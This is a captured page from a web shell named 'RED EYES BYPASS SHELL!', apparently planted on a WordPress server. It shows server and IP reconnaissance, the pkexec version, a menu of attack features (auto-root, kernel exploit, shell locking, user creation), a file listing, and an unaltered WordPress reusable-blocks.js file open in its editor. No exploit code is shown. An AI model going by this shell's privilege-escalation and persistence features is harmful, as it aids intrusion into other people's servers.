Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-includes /
js /
dist /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
development
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
a11y.js
8.48
KB
-rwxr-xr-x
a11y.min.js
2.39
KB
-rwxr-xr-x
annotations.js
31.05
KB
-rwxr-xr-x
annotations.min.js
6.8
KB
-rwxr-xr-x
api-fetch.js
22.27
KB
-rwxr-xr-x
api-fetch.min.js
5.27
KB
-rwxr-xr-x
autop.js
15.82
KB
-rwxr-xr-x
autop.min.js
5.54
KB
-rwxr-xr-x
blob.js
3.63
KB
-rwxr-xr-x
blob.min.js
917
B
-rwxr-xr-x
block-directory.js
75.69
KB
-rwxr-xr-x
block-directory.min.js
20.58
KB
-rwxr-xr-x
block-editor.js
2.1
MB
-rwxr-xr-x
block-editor.min.js
685.31
KB
-rwxr-xr-x
block-library.js
1.83
MB
-rwxr-xr-x
block-library.min.js
778.04
KB
-rwxr-xr-x
block-serialization-default-parser.js
14.94
KB
-rwxr-xr-x
block-serialization-default-parser.min.js
2.39
KB
-rwxr-xr-x
blocks.js
538.31
KB
-rwxr-xr-x
blocks.min.js
166.44
KB
-rwxr-xr-x
commands.js
175.76
KB
-rwxr-xr-x
commands.min.js
45.17
KB
-rwxr-xr-x
components.js
2.48
MB
-rwxr-xr-x
components.min.js
744.01
KB
-rwxr-xr-x
compose.js
186.45
KB
-rwxr-xr-x
compose.min.js
34.79
KB
-rwxr-xr-x
core-commands.js
16.33
KB
-rwxr-xr-x
core-commands.min.js
6.32
KB
-rwxr-xr-x
core-data.js
222.05
KB
-rwxr-xr-x
core-data.min.js
52.99
KB
-rwxr-xr-x
customize-widgets.js
109.45
KB
-rwxr-xr-x
customize-widgets.min.js
39.7
KB
-rwxr-xr-x
data-controls.js
7.32
KB
-rwxr-xr-x
data-controls.min.js
1.59
KB
-rwxr-xr-x
data.js
143.12
KB
-rwxr-xr-x
data.min.js
25.39
KB
-rwxr-xr-x
date.js
803.19
KB
-rwxr-xr-x
date.min.js
770.81
KB
-rwxr-xr-x
deprecated.js
4.67
KB
-rwxr-xr-x
deprecated.min.js
729
B
-rwxr-xr-x
dom-ready.js
2.45
KB
-rwxr-xr-x
dom-ready.min.js
498
B
-rwxr-xr-x
dom.js
61.62
KB
-rwxr-xr-x
dom.min.js
12.71
KB
-rwxr-xr-x
edit-post.js
352.4
KB
-rwxr-xr-x
edit-post.min.js
124.25
KB
-rwxr-xr-x
edit-site.js
831.6
KB
-rwxr-xr-x
edit-site.min.js
310.14
KB
-rwxr-xr-x
edit-widgets.js
163.31
KB
-rwxr-xr-x
edit-widgets.min.js
57.49
KB
-rwxr-xr-x
editor.js
428.17
KB
-rwxr-xr-x
editor.min.js
148.53
KB
-rwxr-xr-x
element.js
66.26
KB
-rwxr-xr-x
element.min.js
12.35
KB
-rwxr-xr-x
escape-html.js
6.22
KB
-rwxr-xr-x
escape-html.min.js
1.11
KB
-rwxr-xr-x
format-library.js
63.14
KB
-rwxr-xr-x
format-library.min.js
21.97
KB
-rwxr-xr-x
hooks.js
19.6
KB
-rwxr-xr-x
hooks.min.js
4.52
KB
-rwxr-xr-x
html-entities.js
3.63
KB
-rwxr-xr-x
html-entities.min.js
837
B
-rwxr-xr-x
i18n.js
49.17
KB
-rwxr-xr-x
i18n.min.js
9.22
KB
-rwxr-xr-x
is-shallow-equal.js
4.34
KB
-rwxr-xr-x
is-shallow-equal.min.js
1.07
KB
-rwxr-xr-x
keyboard-shortcuts.js
21.58
KB
-rwxr-xr-x
keyboard-shortcuts.min.js
3.88
KB
-rwxr-xr-x
keycodes.js
33.45
KB
-rwxr-xr-x
keycodes.min.js
3.94
KB
-rwxr-xr-x
list-reusable-blocks.js
30.16
KB
-rwxr-xr-x
list-reusable-blocks.min.js
4.97
KB
-rwxr-xr-x
media-utils.js
21.94
KB
-rwxr-xr-x
media-utils.min.js
7.27
KB
-rwxr-xr-x
notices.js
21.84
KB
-rwxr-xr-x
notices.min.js
2.21
KB
-rwxr-xr-x
nux.js
20.61
KB
-rwxr-xr-x
nux.min.js
4.51
KB
-rwxr-xr-x
plugins.js
17.25
KB
-rwxr-xr-x
plugins.min.js
4.16
KB
-rwxr-xr-x
preferences-persistence.js
27.97
KB
-rwxr-xr-x
preferences-persistence.min.js
4.85
KB
-rwxr-xr-x
preferences.js
11.43
KB
-rwxr-xr-x
preferences.min.js
2.58
KB
-rwxr-xr-x
primitives.js
9.35
KB
-rwxr-xr-x
primitives.min.js
2.41
KB
-rwxr-xr-x
priority-queue.js
13.99
KB
-rwxr-xr-x
priority-queue.min.js
3.36
KB
-rwxr-xr-x
private-apis.js
8.56
KB
-rwxr-xr-x
private-apis.min.js
2.61
KB
-rwxr-xr-x
redux-routine.js
23.53
KB
-rwxr-xr-x
redux-routine.min.js
8.79
KB
-rwxr-xr-x
reusable-blocks.js
20.33
KB
-rwxr-xr-x
reusable-blocks.min.js
6.49
KB
-rwxr-xr-x
rich-text.js
130.94
KB
-rwxr-xr-x
rich-text.min.js
33
KB
-rwxr-xr-x
router.js
25.87
KB
-rwxr-xr-x
router.min.js
4.25
KB
-rwxr-xr-x
server-side-render.js
14.41
KB
-rwxr-xr-x
server-side-render.min.js
4.4
KB
-rwxr-xr-x
shortcode.js
14.94
KB
-rwxr-xr-x
shortcode.min.js
2.87
KB
-rwxr-xr-x
style-engine.js
15.92
KB
-rwxr-xr-x
style-engine.min.js
4.05
KB
-rwxr-xr-x
token-list.js
6.5
KB
-rwxr-xr-x
token-list.min.js
1.27
KB
-rwxr-xr-x
url.js
33.21
KB
-rwxr-xr-x
url.min.js
8.87
KB
-rwxr-xr-x
viewport.js
10.54
KB
-rwxr-xr-x
viewport.min.js
1.94
KB
-rwxr-xr-x
warning.js
2.51
KB
-rwxr-xr-x
warning.min.js
392
B
-rwxr-xr-x
widgets.js
53.61
KB
-rwxr-xr-x
widgets.min.js
20.71
KB
-rwxr-xr-x
wordcount.js
14.7
KB
-rwxr-xr-x
wordcount.min.js
2.47
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reusable-blocks.js
/******/ (function() { // webpackBootstrap /******/ "use strict"; /******/ // The require scope /******/ var __webpack_require__ = {}; /******/ /************************************************************************/ /******/ /* webpack/runtime/define property getters */ /******/ !function() { /******/ // define getter functions for harmony exports /******/ __webpack_require__.d = function(exports, definition) { /******/ for(var key in definition) { /******/ if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) { /******/ Object.defineProperty(exports, key, { enumerable: true, get: definition[key] }); /******/ } /******/ } /******/ }; /******/ }(); /******/ /******/ /* webpack/runtime/hasOwnProperty shorthand */ /******/ !function() { /******/ __webpack_require__.o = function(obj, prop) { return Object.prototype.hasOwnProperty.call(obj, prop); } /******/ }(); /******/ /******/ /* webpack/runtime/make namespace object */ /******/ !function() { /******/ // define __esModule on exports /******/ __webpack_require__.r = function(exports) { /******/ if(typeof Symbol !== 'undefined' && Symbol.toStringTag) { /******/ Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' }); /******/ } /******/ Object.defineProperty(exports, '__esModule', { value: true }); /******/ }; /******/ }(); /******/ /************************************************************************/ var __webpack_exports__ = {}; // ESM COMPAT FLAG __webpack_require__.r(__webpack_exports__); // EXPORTS __webpack_require__.d(__webpack_exports__, { "ReusableBlocksMenuItems": function() { return /* reexport */ ReusableBlocksMenuItems; }, "store": function() { return /* reexport */ store; } }); // NAMESPACE OBJECT: ./node_modules/@wordpress/reusable-blocks/build-module/store/actions.js var actions_namespaceObject = {}; __webpack_require__.r(actions_namespaceObject); __webpack_require__.d(actions_namespaceObject, { "__experimentalConvertBlockToStatic": function() { return __experimentalConvertBlockToStatic; }, "__experimentalConvertBlocksToReusable": function() { return __experimentalConvertBlocksToReusable; }, "__experimentalDeleteReusableBlock": function() { return __experimentalDeleteReusableBlock; }, "__experimentalSetEditingReusableBlock": function() { return __experimentalSetEditingReusableBlock; } }); // NAMESPACE OBJECT: ./node_modules/@wordpress/reusable-blocks/build-module/store/selectors.js var selectors_namespaceObject = {}; __webpack_require__.r(selectors_namespaceObject); __webpack_require__.d(selectors_namespaceObject, { "__experimentalIsEditingReusableBlock": function() { return __experimentalIsEditingReusableBlock; } }); ;// CONCATENATED MODULE: external ["wp","data"] var external_wp_data_namespaceObject = window["wp"]["data"]; ;// CONCATENATED MODULE: external ["wp","blockEditor"] var external_wp_blockEditor_namespaceObject = window["wp"]["blockEditor"]; ;// CONCATENATED MODULE: external ["wp","blocks"] var external_wp_blocks_namespaceObject = window["wp"]["blocks"]; ;// CONCATENATED MODULE: external ["wp","i18n"] var external_wp_i18n_namespaceObject = window["wp"]["i18n"]; ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/store/actions.js /** * WordPress dependencies */ /** * Returns a generator converting a reusable block into a static block. * * @param {string} clientId The client ID of the block to attach. */ const __experimentalConvertBlockToStatic = clientId => ({ registry }) => { const oldBlock = registry.select(external_wp_blockEditor_namespaceObject.store).getBlock(clientId); const reusableBlock = registry.select('core').getEditedEntityRecord('postType', 'wp_block', oldBlock.attributes.ref); const newBlocks = (0,external_wp_blocks_namespaceObject.parse)(typeof reusableBlock.content === 'function' ? reusableBlock.content(reusableBlock) : reusableBlock.content); registry.dispatch(external_wp_blockEditor_namespaceObject.store).replaceBlocks(oldBlock.clientId, newBlocks); }; /** * Returns a generator converting one or more static blocks into a pattern. * * @param {string[]} clientIds The client IDs of the block to detach. * @param {string} title Pattern title. * @param {undefined|'unsynced'} syncType They way block is synced, current undefined (synced) and 'unsynced'. */ const __experimentalConvertBlocksToReusable = (clientIds, title, syncType) => async ({ registry, dispatch }) => { const meta = syncType === 'unsynced' ? { wp_pattern_sync_status: syncType } : undefined; const reusableBlock = { title: title || (0,external_wp_i18n_namespaceObject.__)('Untitled Pattern block'), content: (0,external_wp_blocks_namespaceObject.serialize)(registry.select(external_wp_blockEditor_namespaceObject.store).getBlocksByClientId(clientIds)), status: 'publish', meta }; const updatedRecord = await registry.dispatch('core').saveEntityRecord('postType', 'wp_block', reusableBlock); if (syncType === 'unsynced') { return; } const newBlock = (0,external_wp_blocks_namespaceObject.createBlock)('core/block', { ref: updatedRecord.id }); registry.dispatch(external_wp_blockEditor_namespaceObject.store).replaceBlocks(clientIds, newBlock); dispatch.__experimentalSetEditingReusableBlock(newBlock.clientId, true); }; /** * Returns a generator deleting a reusable block. * * @param {string} id The ID of the reusable block to delete. */ const __experimentalDeleteReusableBlock = id => async ({ registry }) => { const reusableBlock = registry.select('core').getEditedEntityRecord('postType', 'wp_block', id); // Don't allow a reusable block with a temporary ID to be deleted. if (!reusableBlock) { return; } // Remove any other blocks that reference this reusable block. const allBlocks = registry.select(external_wp_blockEditor_namespaceObject.store).getBlocks(); const associatedBlocks = allBlocks.filter(block => (0,external_wp_blocks_namespaceObject.isReusableBlock)(block) && block.attributes.ref === id); const associatedBlockClientIds = associatedBlocks.map(block => block.clientId); // Remove the parsed block. if (associatedBlockClientIds.length) { registry.dispatch(external_wp_blockEditor_namespaceObject.store).removeBlocks(associatedBlockClientIds); } await registry.dispatch('core').deleteEntityRecord('postType', 'wp_block', id); }; /** * Returns an action descriptor for SET_EDITING_REUSABLE_BLOCK action. * * @param {string} clientId The clientID of the reusable block to target. * @param {boolean} isEditing Whether the block should be in editing state. * @return {Object} Action descriptor. */ function __experimentalSetEditingReusableBlock(clientId, isEditing) { return { type: 'SET_EDITING_REUSABLE_BLOCK', clientId, isEditing }; } ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/store/reducer.js /** * WordPress dependencies */ function isEditingReusableBlock(state = {}, action) { if (action?.type === 'SET_EDITING_REUSABLE_BLOCK') { return { ...state, [action.clientId]: action.isEditing }; } return state; } /* harmony default export */ var reducer = ((0,external_wp_data_namespaceObject.combineReducers)({ isEditingReusableBlock })); ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/store/selectors.js /** * Returns true if reusable block is in the editing state. * * @param {Object} state Global application state. * @param {number} clientId the clientID of the block. * @return {boolean} Whether the reusable block is in the editing state. */ function __experimentalIsEditingReusableBlock(state, clientId) { return state.isEditingReusableBlock[clientId]; } ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/store/index.js /** * WordPress dependencies */ /** * Internal dependencies */ const STORE_NAME = 'core/reusable-blocks'; /** * Store definition for the reusable blocks namespace. * * @see https://github.com/WordPress/gutenberg/blob/HEAD/packages/data/README.md#createReduxStore * * @type {Object} */ const store = (0,external_wp_data_namespaceObject.createReduxStore)(STORE_NAME, { actions: actions_namespaceObject, reducer: reducer, selectors: selectors_namespaceObject }); (0,external_wp_data_namespaceObject.register)(store); ;// CONCATENATED MODULE: external ["wp","element"] var external_wp_element_namespaceObject = window["wp"]["element"]; ;// CONCATENATED MODULE: external ["wp","components"] var external_wp_components_namespaceObject = window["wp"]["components"]; ;// CONCATENATED MODULE: external ["wp","primitives"] var external_wp_primitives_namespaceObject = window["wp"]["primitives"]; ;// CONCATENATED MODULE: ./node_modules/@wordpress/icons/build-module/library/symbol.js /** * WordPress dependencies */ const symbol = (0,external_wp_element_namespaceObject.createElement)(external_wp_primitives_namespaceObject.SVG, { xmlns: "http://www.w3.org/2000/svg", viewBox: "0 0 24 24" }, (0,external_wp_element_namespaceObject.createElement)(external_wp_primitives_namespaceObject.Path, { d: "M21.3 10.8l-5.6-5.6c-.7-.7-1.8-.7-2.5 0l-5.6 5.6c-.7.7-.7 1.8 0 2.5l5.6 5.6c.3.3.8.5 1.2.5s.9-.2 1.2-.5l5.6-5.6c.8-.7.8-1.9.1-2.5zm-1 1.4l-5.6 5.6c-.1.1-.3.1-.4 0l-5.6-5.6c-.1-.1-.1-.3 0-.4l5.6-5.6s.1-.1.2-.1.1 0 .2.1l5.6 5.6c.1.1.1.3 0 .4zm-16.6-.4L10 5.5l-1-1-6.3 6.3c-.7.7-.7 1.8 0 2.5L9 19.5l1.1-1.1-6.3-6.3c-.2 0-.2-.2-.1-.3z" })); /* harmony default export */ var library_symbol = (symbol); ;// CONCATENATED MODULE: external ["wp","notices"] var external_wp_notices_namespaceObject = window["wp"]["notices"]; ;// CONCATENATED MODULE: external ["wp","coreData"] var external_wp_coreData_namespaceObject = window["wp"]["coreData"]; ;// CONCATENATED MODULE: external ["wp","privateApis"] var external_wp_privateApis_namespaceObject = window["wp"]["privateApis"]; ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/lock-unlock.js /** * WordPress dependencies */ const { unlock } = (0,external_wp_privateApis_namespaceObject.__dangerousOptInToUnstableAPIsOnlyForCoreModules)('I know using unstable features means my plugin or theme will inevitably break on the next WordPress release.', '@wordpress/reusable-blocks'); ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/components/reusable-blocks-menu-items/reusable-block-convert-button.js /** * WordPress dependencies */ /** * Internal dependencies */ /** * Menu control to convert block(s) to reusable block. * * @param {Object} props Component props. * @param {string[]} props.clientIds Client ids of selected blocks. * @param {string} props.rootClientId ID of the currently selected top-level block. * @return {import('@wordpress/element').WPComponent} The menu control or null. */ function ReusableBlockConvertButton({ clientIds, rootClientId }) { const { useReusableBlocksRenameHint, ReusableBlocksRenameHint } = unlock(external_wp_blockEditor_namespaceObject.privateApis); const showRenameHint = useReusableBlocksRenameHint(); const [syncType, setSyncType] = (0,external_wp_element_namespaceObject.useState)(undefined); const [isModalOpen, setIsModalOpen] = (0,external_wp_element_namespaceObject.useState)(false); const [title, setTitle] = (0,external_wp_element_namespaceObject.useState)(''); const canConvert = (0,external_wp_data_namespaceObject.useSelect)(select => { var _getBlocksByClientId; const { canUser } = select(external_wp_coreData_namespaceObject.store); const { getBlocksByClientId, canInsertBlockType, getBlockRootClientId } = select(external_wp_blockEditor_namespaceObject.store); const rootId = rootClientId || (clientIds.length > 0 ? getBlockRootClientId(clientIds[0]) : undefined); const blocks = (_getBlocksByClientId = getBlocksByClientId(clientIds)) !== null && _getBlocksByClientId !== void 0 ? _getBlocksByClientId : []; const isReusable = blocks.length === 1 && blocks[0] && (0,external_wp_blocks_namespaceObject.isReusableBlock)(blocks[0]) && !!select(external_wp_coreData_namespaceObject.store).getEntityRecord('postType', 'wp_block', blocks[0].attributes.ref); const _canConvert = // Hide when this is already a reusable block. !isReusable && // Hide when reusable blocks are disabled. canInsertBlockType('core/block', rootId) && blocks.every(block => // Guard against the case where a regular block has *just* been converted. !!block && // Hide on invalid blocks. block.isValid && // Hide when block doesn't support being made reusable. (0,external_wp_blocks_namespaceObject.hasBlockSupport)(block.name, 'reusable', true)) && // Hide when current doesn't have permission to do that. !!canUser('create', 'blocks'); return _canConvert; }, [clientIds, rootClientId]); const { __experimentalConvertBlocksToReusable: convertBlocksToReusable } = (0,external_wp_data_namespaceObject.useDispatch)(store); const { createSuccessNotice, createErrorNotice } = (0,external_wp_data_namespaceObject.useDispatch)(external_wp_notices_namespaceObject.store); const onConvert = (0,external_wp_element_namespaceObject.useCallback)(async function (reusableBlockTitle) { try { await convertBlocksToReusable(clientIds, reusableBlockTitle, syncType); createSuccessNotice(!syncType ? (0,external_wp_i18n_namespaceObject.sprintf)( // translators: %s: the name the user has given to the pattern. (0,external_wp_i18n_namespaceObject.__)('Synced Pattern created: %s'), reusableBlockTitle) : (0,external_wp_i18n_namespaceObject.sprintf)( // translators: %s: the name the user has given to the pattern. (0,external_wp_i18n_namespaceObject.__)('Unsynced Pattern created: %s'), reusableBlockTitle), { type: 'snackbar', id: 'convert-to-reusable-block-success' }); } catch (error) { createErrorNotice(error.message, { type: 'snackbar', id: 'convert-to-reusable-block-error' }); } }, [convertBlocksToReusable, clientIds, syncType, createSuccessNotice, createErrorNotice]); if (!canConvert) { return null; } return (0,external_wp_element_namespaceObject.createElement)(external_wp_blockEditor_namespaceObject.BlockSettingsMenuControls, null, ({ onClose }) => (0,external_wp_element_namespaceObject.createElement)(external_wp_element_namespaceObject.Fragment, null, (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.MenuItem, { icon: library_symbol, onClick: () => setIsModalOpen(true) }, showRenameHint ? (0,external_wp_i18n_namespaceObject.__)('Create pattern/reusable block') : (0,external_wp_i18n_namespaceObject.__)('Create pattern')), isModalOpen && (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.Modal, { title: (0,external_wp_i18n_namespaceObject.__)('Create pattern'), onRequestClose: () => { setIsModalOpen(false); setTitle(''); }, overlayClassName: "reusable-blocks-menu-items__convert-modal" }, (0,external_wp_element_namespaceObject.createElement)("form", { onSubmit: event => { event.preventDefault(); onConvert(title); setIsModalOpen(false); setTitle(''); onClose(); } }, (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.__experimentalVStack, { spacing: "5" }, (0,external_wp_element_namespaceObject.createElement)(ReusableBlocksRenameHint, null), (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.TextControl, { __nextHasNoMarginBottom: true, label: (0,external_wp_i18n_namespaceObject.__)('Name'), value: title, onChange: setTitle, placeholder: (0,external_wp_i18n_namespaceObject.__)('My pattern') }), (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.ToggleControl, { label: (0,external_wp_i18n_namespaceObject.__)('Synced'), help: (0,external_wp_i18n_namespaceObject.__)('Editing the pattern will update it anywhere it is used.'), checked: !syncType, onChange: () => { setSyncType(!syncType ? 'unsynced' : undefined); } }), (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.__experimentalHStack, { justify: "right" }, (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.Button, { variant: "tertiary", onClick: () => { setIsModalOpen(false); setTitle(''); } }, (0,external_wp_i18n_namespaceObject.__)('Cancel')), (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.Button, { variant: "primary", type: "submit" }, (0,external_wp_i18n_namespaceObject.__)('Create')))))))); } ;// CONCATENATED MODULE: external ["wp","url"] var external_wp_url_namespaceObject = window["wp"]["url"]; ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/components/reusable-blocks-menu-items/reusable-blocks-manage-button.js /** * WordPress dependencies */ /** * Internal dependencies */ function ReusableBlocksManageButton({ clientId }) { const { canRemove, isVisible, innerBlockCount, managePatternsUrl } = (0,external_wp_data_namespaceObject.useSelect)(select => { const { getBlock, canRemoveBlock, getBlockCount, getSettings } = select(external_wp_blockEditor_namespaceObject.store); const { canUser } = select(external_wp_coreData_namespaceObject.store); const reusableBlock = getBlock(clientId); const isBlockTheme = getSettings().__unstableIsBlockBasedTheme; return { canRemove: canRemoveBlock(clientId), isVisible: !!reusableBlock && (0,external_wp_blocks_namespaceObject.isReusableBlock)(reusableBlock) && !!canUser('update', 'blocks', reusableBlock.attributes.ref), innerBlockCount: getBlockCount(clientId), // The site editor and templates both check whether the user // has edit_theme_options capabilities. We can leverage that here // and omit the manage patterns link if the user can't access it. managePatternsUrl: isBlockTheme && canUser('read', 'templates') ? (0,external_wp_url_namespaceObject.addQueryArgs)('site-editor.php', { path: '/patterns' }) : (0,external_wp_url_namespaceObject.addQueryArgs)('edit.php', { post_type: 'wp_block' }) }; }, [clientId]); const { __experimentalConvertBlockToStatic: convertBlockToStatic } = (0,external_wp_data_namespaceObject.useDispatch)(store); if (!isVisible) { return null; } return (0,external_wp_element_namespaceObject.createElement)(external_wp_blockEditor_namespaceObject.BlockSettingsMenuControls, null, (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.MenuItem, { href: managePatternsUrl }, (0,external_wp_i18n_namespaceObject.__)('Manage patterns')), canRemove && (0,external_wp_element_namespaceObject.createElement)(external_wp_components_namespaceObject.MenuItem, { onClick: () => convertBlockToStatic(clientId) }, innerBlockCount > 1 ? (0,external_wp_i18n_namespaceObject.__)('Detach patterns') : (0,external_wp_i18n_namespaceObject.__)('Detach pattern'))); } /* harmony default export */ var reusable_blocks_manage_button = (ReusableBlocksManageButton); ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/components/reusable-blocks-menu-items/index.js /** * WordPress dependencies */ /** * Internal dependencies */ function ReusableBlocksMenuItems({ rootClientId }) { const clientIds = (0,external_wp_data_namespaceObject.useSelect)(select => select(external_wp_blockEditor_namespaceObject.store).getSelectedBlockClientIds(), []); return (0,external_wp_element_namespaceObject.createElement)(external_wp_element_namespaceObject.Fragment, null, (0,external_wp_element_namespaceObject.createElement)(ReusableBlockConvertButton, { clientIds: clientIds, rootClientId: rootClientId }), clientIds.length === 1 && (0,external_wp_element_namespaceObject.createElement)(reusable_blocks_manage_button, { clientId: clientIds[0] })); } ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/components/index.js ;// CONCATENATED MODULE: ./node_modules/@wordpress/reusable-blocks/build-module/index.js (window.wp = window.wp || {}).reusableBlocks = __webpack_exports__; /******/ })() ;
Close